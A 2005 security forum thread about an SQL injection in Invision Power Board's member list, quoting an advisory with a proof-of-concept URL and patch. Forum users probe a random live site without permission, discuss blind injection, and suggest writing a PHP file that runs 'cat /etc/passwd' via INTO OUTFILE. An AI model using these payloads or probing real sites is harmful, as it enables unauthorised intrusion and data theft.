 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Sql Injection in Invision Power Board |
 |
 Posted: Tue Apr 12, 2005 12:52 pm |
 |
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
Just found this advisory:
http://www.securityfocus.com/archive/1/395515/2005-04-09/2005-04-15/0
| Quote: |
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory (http://www.digitalparadox.org/services.ah)
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Severity: Medium
Title: Invision board 1.3.1 and below are vulnerable to a sql injection vulnerability
[PATCH INCLUDED]
Date: 09/04/2005
Vendor: Invision Invision Power Services
Vendor Website: http://www.invisionboard.com/
Summary: Invision board 1.3.1 and lower are vulnerable to a sql injection vulnerability
which is caused by the non validation of input in the $this->first variable
**********************************************************************************************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more
at http://www.digitalparadox.org/services.ah
**********************************************************************************************************
Proof of Concept Exploit:
http://localhost/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION
**************
Patch info
**************
A patched version of the vulnerable file can be found at, http://www.digitalparadox.org/memberlist.txt
Just replace /uploads/sources/memberlist.php with this, and it will be fixed.
A simple patch can be,
In /uploads/sources/memberlist.php on Line 274 add this code
[CODE BEGINS]
if (!is_numeric($this->first)) {
$this->first = "0";
}
[CODE ENDS]
So it should finally look like,
[CODE BEGINS]
$this->output .= $this->html->Page_header( array( 'SHOW_PAGES' =>
$links) );
//-----------------------------
// START THE LISTING
//-----------------------------
if (!is_numeric($this->first)) {
$this->first = "0";
}
$DB->query("SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title,
m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
[CODE ENDS]
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com,
please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Lookout for my soon to come out book on Secure coding with
php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQlqrUSZV5e8av/DUEQJMtQCfZWYAAYfGX5zfmCWHxMGZffi87tUAnRGj
hAJ8nVzhK+VIlL4iPxDJRh02
=n3TC
-----END PGP SIGNATURE-----
|
So why not test it in real world - picked up an random site:
| Code: |
http://****.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=f00bar
|
And we can see nice debug message:
| Code: |
There appears to be an error with the *** Community Forums database.
You can try to refresh the page by clicking here, if this does not fix the error, you can contact the board administrator by clicking here
Error Returned
mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM
We apologise for any inconvenience
|
So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality  |
|
|
|
|
|
|
|
|
| Posted: Tue Apr 12, 2005 6:34 pm |
|
|
| Alkaen |
| Regular user |
 |
|
| Joined: Feb 16, 2005 |
| Posts: 5 |
| Location: Bahrain - Aldair |
|
|
|
|
|
|
All steps are okay.. but how i can exploit this sql injection?!
So that's mean what i've to do after appearing of the error message?
Thanx.. |
|
|
|
|
| Posted: Wed Apr 13, 2005 4:05 am |
|
|
| shai-tan |
| Valuable expert |
 |
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
| Does invision use SHA1 ???? I never knew...... and I never used. Ive got a cracked version of vBulletin 3.0 that Ive used but I've never used invision trail or full. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Wed Apr 13, 2005 11:42 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Alkaen wrote: | All steps are okay.. but how i can exploit this sql injection?!
So that's mean what i've to do after appearing of the error message?
Thanx.. |
Well, it's complicated. There is need for blind sql attack methods and subqueries (i suggest benchmark() function). But as far as i know, most of the mysql databases on internet right now are version < 4.1.x and so they have no subqueries functionality |
|
|
|
|
| Posted: Wed Apr 13, 2005 11:45 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
| Yes I'm still wondering why Fedora Core 3 came with MySql 3 it baffles me. I noticed the changes in 4.1 though. A lot of people did/do. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Wed Apr 13, 2005 11:48 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| shai-tan wrote: | | Yes I'm still wondering why Fedora Core 3 came with MySql 3 it baffles me. I noticed the changes in 4.1 though. A lot of people did/do. |
Yeah, this is frustrating,. when you have found some nice sql injection hole in some prominent website and then will see - b00m - no UNION possibilities 
Wtf? It's 21. century, webmasters and admins!!! Cmn, we want union tricks to be working!! We want subqueries to be working!! And in future, we want multiple queries in mysql/php platform too (like now in mssql/oracle) |
|
|
|
|
| Posted: Wed Apr 13, 2005 11:51 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
| They take the things you love and dont bother to give a few things to replace. |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Fri Apr 15, 2005 1:10 pm |
|
|
| Ratinho |
| Beginner |
|
|
| Joined: Mar 20, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
|
Hey.. |
|
| Posted: Mon Apr 25, 2005 2:40 pm |
|
|
| Dcrab |
| Valuable expert |
|
|
| Joined: Apr 25, 2005 |
| Posts: 7 |
|
|
|
|
|
|
|
Hey,
Waraxe: you hit the money with that post about frustration lol.. after all that auditing when you come to know its not exploitable.. lol thats frustrating, you probably know what i mean heh btw if you msn catch me at dcrab[at]hackerscenter[dotdotodotdotodotspamdotdotdot]com itll be nice to talk to you. |
|
|
|
|
| Posted: Mon Apr 25, 2005 4:46 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Hi, Dcrab! Nice to see ya! So much advisories from you ... its amazing 
If this will continue, then i don't have soon any targets to analyze  |
|
|
|
|
| Posted: Mon Apr 25, 2005 6:32 pm |
|
|
| Dcrab |
| Valuable expert |
|
|
| Joined: Apr 25, 2005 |
| Posts: 7 |
|
|
|
|
|
|
|
| haha i know what you mean.. i have already run out of ideas :p do you msn..? |
|
|
|
|
|
Re: Sql Injection in Invision Power Board |
|
| Posted: Mon Apr 25, 2005 10:21 pm |
|
|
| cXIb8O3 |
| Active user |
 |
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
| waraxe wrote: |
So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality |
hym.. lock.. if you have right in mysql... (INTO) that LIMIT 0,10 INTO OUTFILE '/path/file.php'/*
if you can to m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions insert php code (example <? exec('cat /etc/passwd'); ?>)...
can you include file. |
|
|
|
|
|
Re: Sql Injection in Invision Power Board |
|
| Posted: Mon Apr 25, 2005 10:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| cXIb8O3 wrote: | | waraxe wrote: |
So, this Sql Injection is in "LIMIT x,y" section in query, and as i know, it can be useful only in case of mysql version >= 4.1 with subqueries functionality |
hym.. lock.. if you have right in mysql... (INTO) that LIMIT 0,10 INTO OUTFILE '/path/file.php'/*
if you can to m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions insert php code (example <? exec('cat /etc/passwd'); ?>)...
can you include file. |
From mysql manual:
http://dev.mysql.com/doc/mysql/en/select.html
| Code: |
13.1.7. SELECT Syntax
13.1.7.1. JOIN Syntax
13.1.7.2. UNION Syntax
SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr, ...
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name']
[FROM table_references
[WHERE where_definition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_definition]
[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[FOR UPDATE | LOCK IN SHARE MODE]]
|
As i can understand, after "LIMIT x,y" there can be only subqueries useful maybe...
But this is right - if we have sql injection with INSERT INTO possibility and current mysql user has file operation permissions, then we can try to write out file with php/perl/whatever code inside, and therefore such sql injection can be possibly turned out to possible shell level access. |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 25, 2005 10:33 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Dcrab wrote: | | haha i know what you mean.. i have already run out of ideas :p do you msn..? |
I prefer quiet peaceful life, so no msn/ym/icq/irc/skype/cellphone
But in very rare cases i use yahoo messenger. You can email me, i am checking my mailbox many times a day. |
|
|
|
|
|
Re: Sql Injection in Invision Power Board |
|
| Posted: Mon Apr 25, 2005 10:48 pm |
|
|
| cXIb8O3 |
| Active user |
|
|
| Joined: Feb 17, 2005 |
| Posts: 26 |
| Location: Poland<>Luxembourg |
|
|
|
|
|
|
| waraxe wrote: |
mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30
mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM
|
in this query... we can't use UNION because is there ORDER BY. ; ] but after LIMIT you can use UNION |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 104
Members: 0
Total: 104
